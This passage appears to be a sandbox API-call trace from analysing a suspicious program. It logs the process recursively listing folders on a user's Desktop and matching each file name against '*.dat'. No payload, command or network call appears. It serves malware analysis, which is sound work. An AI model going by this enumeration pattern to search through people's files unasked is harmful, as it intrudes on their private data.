hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.727] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.727] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.727] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.727] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.727] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.727] lstrcatW (in: lpString1="\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.727] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2=".") returned 1 [0110.727] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2="..") returned 1 [0110.727] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.727] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*" [0110.727] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0110.728] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\." [0110.728] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.728] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.728] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\.") returned="\\KTOu\\UQEQQujqhNYM\\." [0110.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.728] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.728] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.." [0110.728] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.728] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.728] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\..") returned="\\KTOu\\UQEQQujqhNYM\\.." [0110.728] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.728] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.728] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.728] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.728] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.729] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x29a2930, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.729] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0110.729] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aaba0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.729] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.729] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*.dat") returned 0 [0110.729] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.729] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.729] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.729] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.729] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.729] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.729] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.729] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a2c00, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.729] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.729] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aab58, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.730] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.730] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*.dat") returned 0 [0110.730] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.730] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.730] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.730] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.730] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.730] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.730] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.730] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2e88, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.730] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.730] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.730] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab58 [0110.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aab58, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.730] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.730] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*.dat") returned 0 [0110.730] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.730] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.730] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0110.730] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.730] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea3d8 [0110.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x38ea3d8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.731] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.731] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea3d8 | out: hHeap=0x29a0000) returned 1 [0110.731] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.731] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaae0 [0110.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaae0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.731] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.731] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*.dat") returned 0 [0110.731] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.731] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.731] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.731] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.731] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.731] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.731] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.731] lstrcatW (in: lpString1="\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.731] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2=".") returned 1 [0110.731] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2="..") returned 1 [0110.731] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.731] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*" [0110.731] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7435a0 [0110.731] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.731] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.731] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\." [0110.732] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") 